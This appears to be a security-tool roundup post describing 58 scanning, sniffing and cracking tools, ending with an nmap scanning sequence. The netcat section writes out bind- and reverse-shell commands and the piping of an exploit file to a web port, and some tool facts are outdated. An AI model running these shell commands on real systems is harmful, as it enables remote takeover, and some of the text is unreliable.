MORE THAN 50 DIFFERENT HACKING TIPS OR TOOLS + USAGE BY UNDERCODE
1) Nessus began as the main vulnerability scanner for UNIX and was later brought to Windows. Its main functions include local and remote security auditing; it uses a client/server architecture, has a GTK graphical interface, and supports a scripting language for writing plug-ins. It is free and open source.
2) Wireshark. Speaking of Wireshark, one must mention Ethereal. Ethereal and Sniffer Pro on Windows were the two heroes of network sniffing tools, but unlike Sniffer Pro, Ethereal was more widely used on Linux-based systems. Wireshark is the successor of Ethereal, the network sniffer released after Ethereal was acquired. It is a powerful network capture tool that can analyze traffic and find the root cause of worms, Trojan horses and ARP spoofing at the first opportunity.
3) Snort. Snort is free and cross-platform; it is used as a sniffer, packet logger and intrusion detector for monitoring small TCP/IP networks. It runs on Linux/UNIX and Windows and has three working modes: sniffer, packet logger and network intrusion detection system.
In sniffer mode, Snort reads packets from the network and displays them on the console. For example, to print TCP/IP packet header information on the screen, enter the command: snort -v
4) Netcat
netcat is known as the 'Swiss Army Knife': a simple and useful tool that reads and writes data across a network connection using the TCP or UDP protocol. It is designed as a stable backdoor tool and a powerful network debugging and probing tool.
1) Example: connect to TCP port 80 of 192.168.xx: nc -nvv 192.168.xx 80
2) Listen on TCP port 80 of the local machine: nc -l -p 80
3) Scan all ports of 192.168.xx from TCP 80 to TCP 445: nc -nvv -w2 -z 192.168.xx 80-445
4) Bind the REMOTE host's CMD shell to TCP port 5354 of the REMOTE host; run on the REMOTE host: nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe
5) Bind the REMOTE host's shell and connect back in reverse; for example, to bind the REMOTE host's CMD shell and connect back to TCP port 5354 of 192.168.xx: nc -t -e c:\winnt\system32\cmd.exe 192.168.xx 5354
6) Used as an attack program; for example, connect to port 80 of 192.168.xx and send the contents of 'c:\exploit.txt' through the pipe:
format 1: type c:\exploit.txt | nc -nvv 192.168.xx 80
format 2: nc -nvv 192.168.xx 80 < c:\exploit.txt
7) Used as a honeypot; for example, '-L' (note the uppercase L) keeps listening on a port until Ctrl+C:
Format: nc -L -p 80
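To show what the netcat commands above actually do at the socket level, here is an added example (not from the original post and not part of netcat) that reproduces three of them in Python on the loopback interface: a one-shot listener like `nc -l -p PORT`, a client that sends a payload and reads the answer like `nc -nvv HOST PORT < file`, and a connect-only probe like `nc -z -w2 HOST PORT`. The listener binds port 0 so the OS picks a free port; the payload and reply strings are constructed sample data.

```python
import socket
import threading


def start_listener(bind_host="127.0.0.1", reply=b"hello from listener\n"):
    """Like `nc -l -p PORT`: listen on one TCP port, accept a single connection,
    record what the peer sends, answer with `reply`, then close the listener.
    Binds port 0 so the OS assigns a free port; the port is returned."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((bind_host, 0))
    srv.listen(1)
    port = srv.getsockname()[1]
    received = {}  # filled in by the listener thread

    def serve():
        conn, peer = srv.accept()
        with conn:
            received["peer"] = peer
            received["data"] = conn.recv(4096)
            conn.sendall(reply)
        srv.close()  # one-shot: stop listening after the first client, like plain `nc -l`

    thread = threading.Thread(target=serve, daemon=True)
    thread.start()
    return port, received, thread


def connect_and_send(host, port, payload, timeout=2.0):
    """Like `nc -nvv HOST PORT < file`: connect, send the payload, signal end of
    input, and return everything the peer sends back before it closes."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)  # tell the peer we are done writing (EOF on stdin for nc)
        chunks = []
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return b"".join(chunks)


def probe_port(host, port, timeout=2.0):
    """Like `nc -z -w2 HOST PORT`: report whether a TCP connect succeeds within
    the timeout, sending no data (zero-I/O mode)."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:  # covers ConnectionRefusedError and socket.timeout
        return False


def demo_exchange(payload=b"GET / HTTP/1.0\r\n\r\n"):
    """Run listener and client against each other on loopback and report both sides."""
    port, received, thread = start_listener()
    answer = connect_and_send("127.0.0.1", port, payload)
    thread.join(timeout=5)
    return {
        "port": port,
        "listener_got": received.get("data"),
        "client_got": answer,
        # after the one-shot listener closed, a -z style probe must report the port closed
        "port_open_after_close": probe_port("127.0.0.1", port),
    }


if __name__ == "__main__":
    for key, value in demo_exchange().items():
        print(key, "=", value)
```

The `-L` honeypot variant in item 7 differs only in that the listener would loop back to `accept()` instead of closing after the first client.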
5) Metasploit Framework
Metasploit Framework is a complete environment for writing, testing and using exploit code. It provides a reliable platform for penetration testing, shellcode writing and vulnerability research. The framework is mainly written in the object-oriented Perl programming language, with optional components written in C, assembler and Python. As an auxiliary tool for buffer overflow testing, Metasploit Framework can also be described as a vulnerability exploitation and testing platform: it integrates common overflow vulnerabilities and popular shellcodes for various platforms and is constantly updated, making buffer overflow testing convenient and simple.
6) Hping2
Hping2 is a network probing tool, a super variant of ping. This small tool can send custom ICMP, UDP and TCP packets and receive all the replies. For example, you can set the interval between packets (-i uX, where X is in microseconds) with the command: hping2 192.168.0.1 -c 2 -i u1000
7) Kismet
Kismet is a Linux-based wireless network scanner, a very convenient tool for finding the target WLAN by measuring the surrounding wireless signals. When Kismet starts running, it shows all the wireless LANs it has found in the area. The SSID of the AP in each WLAN is displayed in the "Name" column; in that row, the value of the CH column (the channel used by the AP) should match the one noted at the beginning. The information on the far right of the window is the number of WLANs Kismet has discovered, the number of packets captured, the number of encrypted packets, and so on. Even when the target computer is turned off, Kismet can detect packets from the target AP, because the AP keeps sending out "beacons" that tell any computer with a wireless card that an AP is within range.
8) Tcpdump
TcpDump on Linux can completely capture the headers of packets transmitted on the network for analysis. It supports filtering by network layer, protocol, host, network or port, and provides logical operators such as and, or and not to help you remove useless information. tcpdump is a free network analysis tool; in particular, it ships its source code and exposes its interfaces, so it is highly extensible and very useful both for network maintainers and for intruders.
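Both `snort -v` and tcpdump print the IP and TCP header fields of each packet. As an added example that is not code from the original post or from either tool, the following Python parser decodes an Ethernet/IPv4/TCP header from raw bytes, verifies the IPv4 header checksum (a corrupted header is rejected rather than displayed), and renders a tcpdump-style summary line. The frame it parses is a constructed sample (192.168.1.10:40000 -> 192.168.1.20:80, SYN), not a real capture; the MAC addresses are made up.

```python
import socket
import struct

# TCP flag bits, in the order tcpdump abbreviates them.
TCP_FLAGS = [(0x01, "FIN", "F"), (0x02, "SYN", "S"), (0x04, "RST", "R"),
             (0x08, "PSH", "P"), (0x10, "ACK", "."), (0x20, "URG", "U")]


def ipv4_checksum(header: bytes) -> int:
    """RFC 791 header checksum: one's-complement sum of 16-bit words.
    Over a header whose checksum field is already filled in, a valid header yields 0."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_sample_frame() -> bytes:
    """Constructed sample frame: Ethernet II + IPv4 (TTL 64, DF set) + TCP SYN."""
    eth = bytes.fromhex("001122334455") + bytes.fromhex("66778899aabb") + b"\x08\x00"
    tcp = struct.pack("!HHIIBBHHH", 40000, 80, 0x11223344, 0, 5 << 4, 0x02, 65535, 0, 0)
    ip_no_csum = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0x1234, 0x4000, 64, 6, 0,
                             socket.inet_aton("192.168.1.10"), socket.inet_aton("192.168.1.20"))
    csum = ipv4_checksum(ip_no_csum)
    ip = ip_no_csum[:10] + struct.pack("!H", csum) + ip_no_csum[12:]
    return eth + ip + tcp


def parse_frame(frame: bytes) -> dict:
    """Decode Ethernet, IPv4 and (if present) TCP headers; raise ValueError on malformed input."""
    if len(frame) < 14:
        raise ValueError("truncated Ethernet header")
    dst_mac, src_mac = frame[:6], frame[6:12]
    ethertype = struct.unpack("!H", frame[12:14])[0]
    if ethertype != 0x0800:
        raise ValueError("not IPv4 (ethertype 0x%04x)" % ethertype)
    ip = frame[14:]
    if len(ip) < 20:
        raise ValueError("truncated IPv4 header")
    ver_ihl, tos, total_len, ident, flags_frag, ttl, proto, csum, src, dst = \
        struct.unpack("!BBHHHBBH4s4s", ip[:20])
    ihl = (ver_ihl & 0x0F) * 4
    if ver_ihl >> 4 != 4 or ihl < 20 or len(ip) < ihl:
        raise ValueError("bad IPv4 version or header length")
    if ipv4_checksum(ip[:ihl]) != 0:
        raise ValueError("IPv4 header checksum mismatch")
    info = {
        "src_mac": src_mac.hex(":"), "dst_mac": dst_mac.hex(":"),
        "src": socket.inet_ntoa(src), "dst": socket.inet_ntoa(dst),
        "ttl": ttl, "proto": proto, "id": ident, "total_len": total_len,
        "df": bool(flags_frag & 0x4000), "mf": bool(flags_frag & 0x2000),
    }
    if proto == 6:  # TCP
        tcp = ip[ihl:]
        if len(tcp) < 20:
            raise ValueError("truncated TCP header")
        sport, dport, seq, ack, off_res, flags, win, _tcsum, urg = struct.unpack("!HHIIBBHHH", tcp[:20])
        info.update({
            "src_port": sport, "dst_port": dport, "seq": seq, "ack": ack, "window": win,
            "data_offset": (off_res >> 4) * 4,
            "flags": [name for bit, name, _ in TCP_FLAGS if flags & bit],
            "flag_letters": "".join(letter for bit, _, letter in TCP_FLAGS if flags & bit),
        })
    return info


def format_line(info: dict) -> str:
    """Render a tcpdump-like one-line summary for a TCP packet."""
    if "src_port" not in info:
        return "IP %s > %s: proto %d, ttl %d" % (info["src"], info["dst"], info["proto"], info["ttl"])
    return "IP %s.%d > %s.%d: Flags [%s], seq %d, win %d, ttl %d" % (
        info["src"], info["src_port"], info["dst"], info["dst_port"],
        info["flag_letters"], info["seq"], info["window"], info["ttl"])


if __name__ == "__main__":
    print(format_line(parse_frame(build_sample_frame())))
```

Real captures come from a raw socket or a pcap file; the same `parse_frame` applies to each Ethernet frame read from either source.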
9) Cain and Abel
Cain and Abel is a password recovery tool for the Windows platform. It recovers many kinds of passwords using various methods, including sniffing the network, dictionary, brute-force and cryptanalysis attacks on encrypted passwords, recording VoIP sessions, decoding scrambled passwords, recovering wireless network keys, revealing passwords hidden behind asterisks in password boxes, revealing cached passwords, and analyzing routing protocols. The tool does not exploit any software vulnerability or flaw; it takes advantage of inherent weaknesses in protocol standards, authentication methods and caching mechanisms themselves. Its main purpose is simply to recover passwords and credentials from various programs. The software consists of two parts: Cain (Cain.exe) is the program's main graphical interface, and Abel is a Windows service consisting of the files Abel.exe and Abel.dll.
10) John the Ripper
John the Ripper is password-cracking software used to recover the plaintext when the ciphertext is known. The latest version is currently John 1.4, which mainly supports cracking hashes produced with the DES and MD5 methods. It works on many different machine types and many different operating systems.
11) Ettercap
Ettercap was originally designed as a sniffer for switched networks, but as it developed it gained more and more functions and became an effective and flexible man-in-the-middle attack tool. It supports active and passive protocol analysis and includes analysis of many network and host characteristics (such as OS fingerprinting). Ettercap has five sniffing modes:
(1) IPBASED: sniffing based on IP address; Ettercap captures packets based on source IP:port and destination IP:port.
(2) MACBASED: based on MAC address; Ettercap captures packets based on source MAC and destination MAC.
(3) ARPBASED: based on ARP spoofing; Ettercap uses ARP spoofing to monitor the communication between two hosts (full duplex) on a switched LAN.
(4) SMARTARP: in SMARTARP mode, Ettercap uses ARP spoofing to monitor the communication (full duplex) between one host on the switched network and all other known hosts (hosts in the host table).
(5) PUBLICARP: in PUBLICARP mode, Ettercap uses ARP spoofing to monitor the communication between one host on the switched network and all other hosts (half duplex).
12) Nikto
Nikto is an open source, powerful web scanning and assessment tool. It tests web servers for a wide range of security issues and can scan for more than 2,600 potentially dangerous files, CGIs and other problems on more than 230 server types. It can identify the web server type, host name, specific directories, cookies and specific CGI vulnerabilities of a given host, the HTTP methods the host allows, and so on. It also uses the LibWhisker library, but is usually updated more frequently than Whisker. Nikto is one of the essential web audit tools for network security personnel.
13) ping / telnet / dig / traceroute / whois / netstat: the most basic security commands.
14) OpenSSH / PuTTY / SSH
SSH (Secure Shell) is now commonly used to log in to remote computers or execute commands on them. It provides encrypted, secure communication between two untrusted computers over an insecure network, replacing the very unreliable telnet/rlogin/rsh interactive sessions. Most UNIX systems use the open source OpenSSH server and client. Windows users prefer the free PuTTY client, which also runs on a variety of mobile devices. Some Windows users like to use Cygwin, a terminal-based environment that runs OpenSSH.
15) THC Hydra
If someone needs to brute-force a remote authentication service, Hydra is often the tool of choice. It can quickly run dictionary-based attacks against more than 30 protocols, including telnet, ftp, http, https, smb, multiple databases and other services. Like THC Amap, Hydra comes from the private group THC.
16) Paros proxy
Paros proxy is installed between the attacker's browser and the target website, and all requests and responses pass through it, so that the tester can carefully study these packets, including the variables transmitted in the web page, and modify those variables before they are sent on. The proxy is fully featured and can scan for and detect weak points on the website. It can detect some common web application attacks and even detect insecure web components.
17) Dsniff
Dsniff is an advanced password sniffer. It is the first monitoring tool that extends the traditional sniffer concept by injecting crafted packets into the network and redirecting traffic to the attacker's machine. In this way, Dsniff allows an attacker to eavesdrop on data in a switched environment; even if the attacker and the target are not on the same LAN, the attacker can collect the desired data. It supports the telnet, ftp, smtp, pop, imap and http application protocols.
18) NetStumbler
NetStumbler is a tool dedicated to finding wireless APs and is currently the most popular wireless discovery tool. When started, it automatically displays the wireless APs it detects nearby, with their SSID, MAC address, channel, speed, encryption and so on. It is worth mentioning that NetStumbler can display wireless APs whose SSID is hidden. In the software interface, the green light of each AP keeps blinking, and the APs detected on each channel are listed in a tree structure. As NetStumbler performs a full scan, nearby wireless APs are laid bare. Because it was developed in the USA, it can only detect channels 1 to 11, while the domestic wireless band is divided into 13 channels, so wireless APs on channels 12 and 13 cannot be found.
19) THC Amap
Amap can detect which application is listening on a given port. Because of its unique version detection feature, its database does not grow as large as Nmap's. You can consider using it when Nmap fails to identify a service or other software does not work. Another feature of Amap is its ability to parse Nmap output files. This is another valuable tool contributed by THC.
20) GFI LANguard addresses the three main problems of enterprise network vulnerability management: network scanning, network auditing and patch management. GFI LANguard Network Security Scanner (NSS) is an award-winning solution that scans, detects, assesses and remediates security vulnerabilities in the network. As an administrator, you often need to deal with various issues, and sometimes use multiple products to handle network vulnerabilities, patch management and network audits. With GFI LANguard NSS, the three major issues of vulnerability management can be handled through a single control panel with rich reporting capabilities.
21) Aircrack
Aircrack is a set of tools for cracking WEP and WPA, generally used to recover wireless network keys and thereby gain unauthorized entry to wireless networks. Once enough encrypted packets have been collected, it can crack WEP keys of 40 to 512 bits, and can also crack WPA or WPA2 networks through advanced cryptographic methods or brute force.
22) SuperScan
SuperScan is a free but very powerful tool developed by Foundstone. Compared with many similar tools, it is both a hacking tool and a network security tool: a hacker can use its denial-of-service (DoS) features and use it to collect information about remote network hosts, while as a security tool SuperScan can help you discover weaknesses in your own network.
23) Netfilter
In layman's terms, the netfilter architecture places a number of detection points (hooks) at several positions along the whole network packet path, and registers processing functions on each hook to handle the packet (packet filtering, NAT, and so on, or even user-defined functions).
24) Sysinternals
Sysinternals is a suite of security management tools, mainly including:
(1) Process Explorer: a process management tool that can be set to completely replace the system's own task manager (taskmgr) as the default "task manager". Its various monitors show or record the current state of the system very intuitively, and it is very easy to use. Supports XP and Windows 2003 and later.
(2) PsTools: a set of 12 commands for remotely managing Windows NT/2000/XP systems. You can remotely defragment the hard disk, stop the messenger service on a remote computer, view server disk space, view processes on a remote computer and end suspicious ones, send messages, and quickly shut down the remote computer.
(3) Autoruns: a powerful and complete startup item scanning tool.
(4) TCPView: port monitoring software, very small and easy to use.
(5) RootkitRevealer: used to detect whether a rootkit is running on a Windows system. By analyzing differences between the registry and the file system as seen through the system API, it can detect all rootkits published on www.rootkit.com, including AFX, Vanquish, HackerDefender, etc. (Note: RootkitRevealer cannot detect rootkits that hide no files or registry entries, such as FU_Rootkit.)
25) Retina
Retina has been regarded as the most accurate non-embedded network security scanner in the industry. It contains the most comprehensive security vulnerability database, maintained by eEye's research and development team. As professional security software for both distributed enterprise users and users in a stand-alone network environment, Retina has been used by many of the world's largest companies and government departments to assess the network security of their various branches, head offices and government departments, and to correct hidden vulnerabilities and insecure settings in the network.
26) Perl / Python / Ruby
Perl is older than Ruby or Python. Perl was once the most popular scripting language and was once considered a must for hackers. You can complete complex data processing in just a few lines, and it is not much slower. Its built-in support for regular expressions and data structures is even more impressive. Many websites used to be written in Perl, and even now some older foreign websites still contain Perl code. The most powerful thing about Perl is its countless libraries: Perl has the largest community in the world, and you can find a library for anything you want. But Perl's shortcomings are also obvious: Perl programs are too flexible, there are usually many solutions to one problem, just as there are many ways to say one sentence, and Perl's syntax is completely alien to people who are not familiar with it. Ruby and Python both appeared as replacements for Perl. The latest Perl adds object-oriented support, and Ruby and Python have better object-oriented support (even better than Java).
27) L0phtcrack
L0phtCrack v5.04, referred to as LC 5, is an essential tool for network administrators. It can be used to check whether Windows and UNIX users have chosen unsafe passwords, and is a password cracking tool for Windows NT/2000/XP and UNIX administrator accounts. Experience has shown that simple or easily cracked administrator passwords are one of the biggest security threats, because attackers can then log on to computer systems as legitimate users without being noticed.
28) Scapy
Scapy is a powerful interactive packet processing tool, packet generator, network scanner, network discovery tool and packet sniffer tool. It provides a variety of functions for interactively generating data packets or data packet collections, manipulating data packets, sending data packets, packet sniffing, response and feedback matching, and so on.
29) Sam Spade
Sam Spade provides a friendly GUI and can easily complete a variety of network query tasks. It was originally developed to track down spammers, but can also be used for a large number of other network probing, network management and security-related tasks. It includes ping, nslookup, whois, dig, traceroute, finger, a raw HTTP web browser, DNS zone transfer, SMTP relay check, website search and other tools; it is an integrated toolbox.
30) GnuPG / PGP
With the development of networks and computer technology, the security of data storage and data exchange has become more and more important, and encryption technology has long been used for both. To ensure the identity of both parties during network data exchange, certificate systems have also matured. GnuPG is a set of tools for encrypting data and creating certificates. Its function is similar to PGP, but PGP uses many patented algorithms.
31)
The Airsnort program uses the shortcomings of the widely used network encryption system "Wi-fi" (or 802.11b) designed according to general standards to enter the network, but another encryption system has not been broken by AirSnort or WEPCrack . The people who designed AirSnort believe that many Internet users do not value or cannot understand the flaws in the Wi-fi encryption system.
32) BackTrack
BackTrack is a self-starting CD based on Slackware and SLAX. It contains a set of security and computer forensics tools. It was actually created by the fusion of Auditor Security Linux and WHAX (formerly Whoppix).
33. P0f
p0f is another passive discrimination tool for remote operating systems after Nmap and Xprobe2. It supports: reverse connection SYN mode, forward connection SYN + ACK mode, empty connection RST + mode, fragmentation ACK mode. It can also detect: whether it is running behind a firewall, whether it is running in NAT mode, whether it is running in load balancing mode, the time the remote system has started, the DSL and ISP information of the remote system, etc.
34) Google: a popular search engine.
35) WebScarab
WebScarab is a proxy framework that includes an intercepting proxy, a web crawler/spider, session analysis, a scripting interface, a fuzzer, encoding and decoding for all popular formats, and a WSDL (web service description language) parser.
36) ntop
ntop associates port usage with the application behind it, much like "netstat -an", and shows details such as when a port was opened and how much traffic it has carried. For example, it can map each open TCP/UDP port to the program using it.
37) Tripwire
Tripwire is the best-known file-system integrity checker for UNIX. It computes a digital signature (a cryptographic hash) for every monitored file and stores it; when a file's current signature no longer matches the stored one, the file has been modified.
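The baseline-and-compare idea behind Tripwire, as an added shell example (not Tripwire's own code): it records a SHA-256 digest for every file under a directory, then reports files that were modified, added or removed since the baseline. The function names, the small /etc tree and the tampering are all constructed inside a temporary directory, so the script is safe to run anywhere.

```shell
#!/bin/sh
# Added example, not Tripwire's own code: a minimal file-integrity baseline.
# Every path and file below is constructed inside a temporary directory.

# Fall back to shasum on systems without GNU coreutils.
command -v sha256sum >/dev/null 2>&1 || sha256sum() { shasum -a 256 "$@"; }

# make_baseline DIR OUT: store "digest  ./path" for every regular file under DIR.
# (Toy limitation: paths containing whitespace are not handled.)
make_baseline() {
    ( cd "$1" && find . -type f | LC_ALL=C sort | while read -r f; do sha256sum "$f"; done ) > "$2"
}

# check_baseline DIR BASELINE: print one line per deviation from the baseline:
#   MODIFIED path   digest differs
#   NEW path        present now, absent from the baseline
#   MISSING path    in the baseline, gone now
# Prints nothing when the tree is unchanged.
check_baseline() {
    cur=$(mktemp)
    make_baseline "$1" "$cur"
    awk 'NR == FNR { old[$2] = $1; next }
         {
             seen[$2] = 1
             if (!($2 in old))       print "NEW " $2
             else if (old[$2] != $1) print "MODIFIED " $2
         }
         END { for (f in old) if (!(f in seen)) print "MISSING " f }' "$2" "$cur"
    rm -f "$cur"
}

# demo_integrity: take a baseline of a small constructed /etc, tamper with it
# the way an intruder might, and return the sorted report.
demo_integrity() {
    work=$(mktemp -d)
    base="$work.baseline"
    mkdir -p "$work/etc"
    printf 'root:x:0:0:root:/root:/bin/sh\n' > "$work/etc/passwd"
    printf 'PermitRootLogin no\n'            > "$work/etc/sshd_config"
    printf 'Authorized use only\n'           > "$work/etc/motd"
    make_baseline "$work" "$base"

    # Simulated tampering: weaken sshd, plant a script, delete the banner.
    printf 'PermitRootLogin yes\n'        > "$work/etc/sshd_config"
    printf '#!/bin/sh\necho tampered\n'   > "$work/etc/backdoor.sh"
    rm -f "$work/etc/motd"

    check_baseline "$work" "$base" | LC_ALL=C sort
    rm -rf "$work" "$base"
}

demo_integrity
```

The baseline file is the weak point of this scheme, exactly as with Tripwire: if an intruder can rewrite it, the check is worthless, so keep it on read-only media or sign it and verify the signature before comparing.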
38) ngrep
ngrep is grep for the network: it applies grep-style pattern matching to packet payloads rather than to text files. Because it is built on libpcap, it supports a wide range of operating systems and network protocols; it recognises TCP, UDP and ICMP packets and understands BPF filter syntax.
39) nbtscan
nbtscan is a small tool that scans a Windows network for NetBIOS information. It only works on the local network, and shows IP address, host name, logged-on user name, MAC address and so on.
40) WebInspect
WebInspect is regarded as a next-generation web application security testing tool. Its main functions: (1) checks the security of web services and web applications using innovative assessment techniques; (2) evaluation; (3) application security testing and collaboration across the whole lifecycle; (4) interactive scans from an advanced user interface; (5) penetration testing with the bundled HP Security Toolkit; (6) configurable to support any web application environment.
41) OpenSSL
SSL (Secure Sockets Layer) provides encrypted transport over the Internet. The OpenSSL package has three main parts: the cryptographic algorithm library, the SSL/TLS protocol library, and the openssl command-line application.
42) Xprobe2
Xprobe2 fingerprints a remote operating system actively: it sends probe packets and applies fuzzy-matrix statistical analysis to the ICMP responses to determine the OS type.
43) EtherApe
A graphical network sniffer that can do the same things as tcpdump with a much friendlier interface. Ethereal and tcpdump both rely on the pcap library (libpcap), so they are alike in many ways (for example, they use the same filter syntax and keywords), and Ethereal works much like other graphical sniffers.
44) Core Impact
Core Impact is widely regarded as the most capable commercial penetration-testing tool, covering assessment and detection of, prevention of, and response to information security threats. By safely replicating real-world attacks against network servers, workstations, end-user systems and web applications, it helps you find and fix security problems.
45) IDA Pro
IDA Pro is an interactive disassembler. It does not solve problems by itself: it locates suspicious instructions but leaves the analysis to you, and your job is to tell IDA how to interpret the code.
46) SolarWinds
SolarWinds is a professional network management suite that monitors and discovers network devices. It includes the following tools:
1) Network performance monitoring: bandwidth gauge, router CPU load, bandwidth monitor, CPU gauge, network performance monitor, SNMP graph and advanced CPU load.
2) Network discovery: subnet list, Ping Sweep, IP network browser, DNS verification, IP address management, MAC address discovery, SNMP Sweep, network positioning.
3) Tools for Cisco networks: IP network browser, router CPU load, config download, config upload, config editor/viewer, proxy ping, compare running vs. startup config, router password decryption, CPU gauge and advanced CPU load.
4) Network monitoring: Watch It!, network monitor, Syslog server, router CPU load, advanced ping and network performance monitor.
5) IP address management: advanced subnet calculator, DNS/WhoIs resolver, DHCP scope monitor, DNS verification, IP address management, Ping Sweep.
6) Security: router security check, TCP Reset, dictionary editor, SNMP brute force attack, SNMP dictionary attack, router password decryption.
7) Ping & diagnostics: ping, advanced ping, Trace Route, proxy ping, Ping Sweep.
8) MIB browser: MIB Walk, update system MIBs, MIB browser, MIB viewer and SNMP graph.
9) Others: TFTP server, WAN Killer, Wake-On-LAN.
47) Pwdump: dumps the password hashes of Windows user accounts.
48) lsof
lsof stands for "list open files": it lists the files currently open on the system. In Linux everything is a file: devices, directories, even sockets. That makes lsof very useful for day-to-day Linux administration.
49) RainbowCrack
RainbowCrack is a password cracker based on precomputed rainbow tables. It targets hash algorithms such as LM, MD5 and SHA-1, and custom algorithms can be added. It runs on Windows and Linux, and tables generated on one system can be used on the other. It is powerful, but more involved to use.
50) Firewalk
Firewalk is a Linux network security tool that uses traceroute-like techniques to analyse IP packet responses, determine gateway ACL filters and map networks.
51) Angry IP Scanner
Angry IP Scanner is an easy-to-use IP and port scanner. For each scanned host it can report ping response time, host name, computer name, workgroup, logged-on user name, MAC address, TTL, NetBIOS information and more. You can specify ports to find which are open on a target; for live hosts you can open them in Explorer, browse them in a web browser, connect over FTP or telnet, ping, tracert, or look up the IP's geographic location on the web. Given only a URL or host name, it resolves the address and scans it. It can also select and scan whole class B and class C ranges, keep a list of frequently used IPs, and export results in several file formats. Because it scans with many threads, it handles dozens of IPs at once and is extremely fast.
52) rkhunter
rkhunter (Rootkit Hunter) can find about 58 known rootkits plus some sniffers and backdoors. It runs a series of test scripts to determine whether the machine has been infected with a rootkit.
53) ike-scan
ike-scan discovers and fingerprints IKE (Internet Key Exchange) services. IKE is the mechanism a VPN server and a remote client use to set up their connection. ike-scan sends crafted IKE packets to every address in the target range; any host running IKE answers, confirming its presence. The tool records and displays these replies and compares them against a database of known VPN product fingerprints.
54) Arpwatch
ARP (Address Resolution Protocol) maps IP addresses to the hardware (MAC) addresses of network devices. On Linux, arpwatch monitors and logs ARP traffic on the local network and reports changes in IP-to-MAC pairings by e-mail.
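The kind of change detection arpwatch performs, as an added example (not arpwatch's own code): an awk state machine over tcpdump-style ARP reply lines that reports a new station, a changed Ethernet address, and a flip flop (an IP bouncing between two MACs, the classic ARP-spoofing symptom). The function names and the capture lines are constructed for the example.

```shell
#!/bin/sh
# Added example, not arpwatch's own code: flag suspicious IP-to-MAC changes in
# a stream of ARP replies. Input is tcpdump-style lines such as
#   10:00:02.000004 ARP, Reply 192.168.56.1 is-at 08:00:27:de:ad:99, length 28
# e.g. from `tcpdump -n -l arp`. The lines in the demo are constructed.

# arp_monitor: read ARP lines on stdin, print one line per event:
#   new station IP MAC                       first time IP is seen
#   changed ethernet address IP MAC (was X)  IP now claims a different MAC
#   flip flop IP MAC (was X)                 IP went back to its previous MAC;
#                                            two hosts fighting over one IP is
#                                            the classic ARP-spoofing symptom
arp_monitor() {
    awk '$2 == "ARP," && $3 == "Reply" {
        ip = $4; mac = $6; sub(/,$/, "", mac)
        if (!(ip in cur)) {
            printf "new station %s %s\n", ip, mac
        } else if (cur[ip] != mac) {
            if (prev[ip] == mac)
                printf "flip flop %s %s (was %s)\n", ip, mac, cur[ip]
            else
                printf "changed ethernet address %s %s (was %s)\n", ip, mac, cur[ip]
        }
        if (cur[ip] != mac) { prev[ip] = cur[ip]; cur[ip] = mac }
    }'
}

# demo_arp_monitor: a constructed capture in which 08:00:27:de:ad:99 starts
# answering for the gateway 192.168.56.1, and the real gateway fights back.
demo_arp_monitor() {
    arp_monitor <<'EOF'
10:00:00.000001 ARP, Reply 192.168.56.1 is-at 52:54:00:aa:bb:01, length 28
10:00:00.000002 ARP, Reply 192.168.56.10 is-at 52:54:00:aa:bb:10, length 28
10:00:01.000003 ARP, Request who-has 192.168.56.1 tell 192.168.56.10, length 28
10:00:02.000004 ARP, Reply 192.168.56.1 is-at 08:00:27:de:ad:99, length 28
10:00:03.000005 ARP, Reply 192.168.56.1 is-at 52:54:00:aa:bb:01, length 28
10:00:04.000006 ARP, Reply 192.168.56.1 is-at 08:00:27:de:ad:99, length 28
EOF
}

demo_arp_monitor
```

A single "changed ethernet address" can be legitimate (a replaced NIC, a DHCP lease moving), which is why arpwatch reports the event rather than acting on it; repeated flip flops on the gateway address within seconds are what deserve an immediate look.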
55) KisMAC
KisMAC is a free wireless sniffer for Mac OS X. The KisMAC installer does not set file permissions securely; a local attacker can use this to gain unauthorized access to sensitive file information.
56) OSSEC HIDS
OSSEC is an open source host-based intrusion detection system with log analysis, integrity checking and rootkit detection. As a HIDS, OSSEC is installed on the system being monitored. You do not always need the full install: with several machines running OSSEC you can use client/server mode, where agents ship their data to a server for analysis. Monitoring many systems from one machine is economical and practical for business and home users alike. OSSEC's biggest advantage is that it runs on almost any operating system: Windows, Linux, OpenBSD/FreeBSD and macOS. The one gap is that Windows agents cannot do rootkit detection; agents on the other platforms have no such limitation.
57) OpenBSD PF
PF is the firewall OpenBSD users love. It provides network address translation, TCP/IP traffic management, bandwidth control and packet prioritisation, plus extras such as passive operating system detection. PF was written by the OpenBSD developers and has been carefully reviewed, designed and coded to avoid the kinds of vulnerabilities found in other packet filters.
58) Nemesis: It can be used to construct almost any type of ICMP packet.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ 57 MOST DANGEROUS TOOLS TESTED. Use them for security, not for harm πΏ
#SUPPORT & SHARE
T.me/UndercodeTesting
π¦ Collection of practical skills of penetration testing Fast tips @undercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Best NMAP scanning strategy
# The best nmap scanning strategy for networks of all sizes
# Host discovery: build a list of live hosts
$ nmap -sn -T4 -oG Discovery.gnmap 192.168.56.0/24
$ grep "Status: Up" Discovery.gnmap | cut -f 2 -d ' ' > LiveHosts.txt
# Port discovery: the most commonly used ports (nmap's default top 1000)
# https://nmap.org/presentations/BHDC08/bhdc08-slides-fyodor.pdf
$ nmap -sS -T4 -Pn -oG TopTCP -iL LiveHosts.txt
$ nmap -sU -T4 -Pn -oN TopUDP -iL LiveHosts.txt
$ nmap -sS -T4 -Pn --top-ports 3674 -oG 3674 -iL LiveHosts.txt
# Port discovery: all ports (the UDP scan will be very slow)
$ nmap -sS -T4 -Pn -p 0-65535 -oN FullTCP -iL LiveHosts.txt
$ nmap -sU -T4 -Pn -p 0-65535 -oN FullUDP -iL LiveHosts.txt
# Collect the open TCP/UDP ports into nmap -p syntax
